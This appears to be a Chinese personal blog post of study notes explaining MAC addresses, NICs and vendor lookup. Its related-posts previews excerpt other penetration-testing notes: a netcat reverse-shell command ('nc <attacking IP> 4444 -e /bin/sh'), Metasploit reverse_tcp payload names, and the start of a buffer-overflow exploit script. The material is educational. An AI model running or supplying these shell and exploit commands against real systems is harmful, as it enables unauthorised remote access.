MAC-addresses
发表于|更新于|Network Security
|浏览量:
MAC 地址
MAC 地址与 OSI 参考模型 的第二层相关。它们针对本地网络中的物理设备进行寻址。 MAC 地址是一个 48 位硬件编号,对于其所连接的设备来说是“唯一”的(在制造过程中分配)。
网络接口卡:
在网络的第 2 层中,每个能够连接到网络的设备都将拥有自己的网络接口卡 (NIC)。 MAC 地址标识网络上的设备,交换机使用它在设备之间路由帧。
MAC 地址查找:
MAC 地址被格式化为 12 位十六进制数。地址中的字节可以用连字符、冒号或句点分隔,具体取决于操作系统。
号码的前六位数字标识设备的制造商。 MAC 地址查找工具可用于查明该设备的制造商。
示例:00:0C:29 解析为制造商 VMware, Inc
[!我以前的笔记(在文本中链接)]
文章作者: xhj
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 xhj的博客!
相关推荐
2025-04-11
effective-notekeeping
有效的笔记客户评估:截取并保存客户参与的屏幕截图是包含评估结果证据的简单方法。屏幕截图应包括目标的证明以及 IP 地址、日期等。 对评估进行详细记录对于报告撰写很重要,对于_历史记录_也很重要。例如:客户可能会在几个月或几年后再次联系您,询问有关他们的评估的信息。 资源:窗口:KeepNote Linux:CherryTree 麦克:乔普林 注意事项:安全:您在订婚时所做的笔记应该受到保护。这些注释可能包括有关客户网络的敏感信息以及可用于攻击他们的详细信息。 注释中还应删除所有 P.I.I.因此,如果它们落入坏人之手,它们所包含的信息就不能直接与个人或组织联系起来。####朋友的建议: “我更喜欢加密存储我的笔记,这样我就不必担心我的笔记落入坏人之手并成为责任。我也尽量不记录除了证明调查结果所需的内容之外的任何内容。几乎在所有情况下,PII、PFI、PHI 或其他敏感信息都不能证明。在我看来,记录这些信息是鲁莽的,因为笔记可能会被破坏,或者信息被复制到不同的系统可能会引发公司的罚款和其他合同和监管责任。 此外,我知道很多经理在谈到指责游戏时都被[编辑了]。我从来不想把某人扔到公...
2025-05-20
shells
反向 Shell 与绑定 ShellShell 只是获取和维护对目标计算机的访问权限的一种方式。最常见的 shell 类型是反向 shell,其中受害计算机连接回我们。用于完成 rev-shell 的常用工具是 Netcat。 Rev 贝壳为了使 rev shell 工作,攻击设备需要侦听特定端口上的连接。在 Netcat 中,我们可以使用以下命令告诉设备监听选定的端口:nc -lvp 4444。 -l 用于监听 -v 表示详细 -p 用于端口通过此命令,我们告诉 Netcat 监听我们机器的端口 4444。 在目标上:为了让目标连接到我们的监听器,我们必须在目标上发送执行命令来建立连接。例如:如果目标安装了netcat(或者我们有一些如何将netcat安装到目标机器上),我们可以使用它来连接回我们的机器。 在这种情况下,目标上的命令将如下所示: 1nc <attacking IP> 4444 -e /bin/sh 在此命令中,目标设备上的 nc 创建一个返回攻击 IP 的 TCP 连接,并使用 -e 标志执行 shell (/bin/bash)(该 shell ...
2025-05-13
payloads
分阶段与非分阶段有效负载有效负载是指建立对目标机器的访问(通常通过 shell)的实际代码或可执行文件。主要有两种类型:阶段式和非阶段式。 非分阶段非分段有效负载一次性发送整个 shellcode 或执行代码。这种类型的有效负载“通常大于”分段有效负载。 上演分阶段的有效负载是分阶段发送到目标的,而不是一次全部发送。由于代码是以块的形式发送的,因此非分阶段的有效负载往往“不太稳定”。然而,分阶段可能是有利的,因为每个阶段都“较小”,并且在发送到目标时不易被检测到。 奖金:使用 Metasploit 时,您可以通过有效负载的路径来识别非阶段性有效负载与阶段性负载: 1234# Non-staged payload:windows/meterpreter_reverse_tcp# Staged payload:windows/meterpreter/reverse_tcp [!我以前的笔记(在文本中链接)] Metasploit
2025-05-12
pattern-create
通过创建图案查找偏移量现在我们知道了与 fuzzing 程序的偏移量,我们可以使用 pattern create 来帮助微调我们的漏洞利用脚本和有效负载。 **!参见模式创建(相对)模式创建 (GitHub 存储库) 查找 确切 地址现在我们已经使用 pattern_create 创建了一个缓冲区字符串,我们可以将模糊测试脚本复制粘贴到新脚本中(当我们对其进行微调时,它将成为我们的漏洞利用程序)。 123456789101112131415161718192021222324252627import sys, socket# Create the buffer of 'A' charactersbuffer = "A" * 100try: # Build the payload by appending the TRUN command to the buffer payload = "TRUN /.:/" + buffer # Create, open, and connect to the socket (conne...
2025-05-29
website-tech-recon
识别网站技术识别 Web 应用程序的前端和后端所使用的技术在侦察阶段非常重要,因为这些信息可用于规划攻击。 使用的技术可能存在您稍后可以利用的漏洞。 工具BuiltWith在这个网站中,您可以输入网站名称并获取有关该网站在其架构中使用的技术的一些基本信息。 WappalyzerWappalyzer 是一个开源工具,您可以将其用作网络浏览器或命令行的插件。 [!编辑]Wappalyzer 不再开源,他们已经将所有 GitHub 存储库设为私有:(。请参阅此处。但是,webanalyze 是一个 Go 命令行工具,它曾经与 Wappalyzer 一起发布,但已切换为“从以下位置加载定义” enthec‘ WhatWebWhatWeb 是 Kali Linux 附带的另一个命令行实用程序。它是开源的,可以在 GitHub 上找到。 用法以下是扫描 morningstarsecurity.com(WhatWeb 的创建者)时的输出示例: 12http://morningstarsecurity.com [301 Moved Permanently] Apache[2.4.29], C...
2025-05-10
nessus-vuln-scanning
使用 Nessus 进行漏洞扫描Nessus 是渗透测试中常用的漏洞扫描器。 安装从 https://www.tenable.com/downloads/nessus?loginAttempted=true 下载该工具。使用 /Downloads 文件夹中的 dpkg -i Nessus... 进行安装。安装该工具时,按照终端中的提示操作,您将需要 Nessus Essentials 的激活码: 1234567Unpacking Nessus Scanner Core Components... - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service - Then go to https://kali:8834/ to configure your scanner┌──(hakcypuppy㉿kali)-[~/Downloads]└─$ /bin/systemctl start nessusd.service 点击链接至 https://kali:8834/: 基本网络扫描...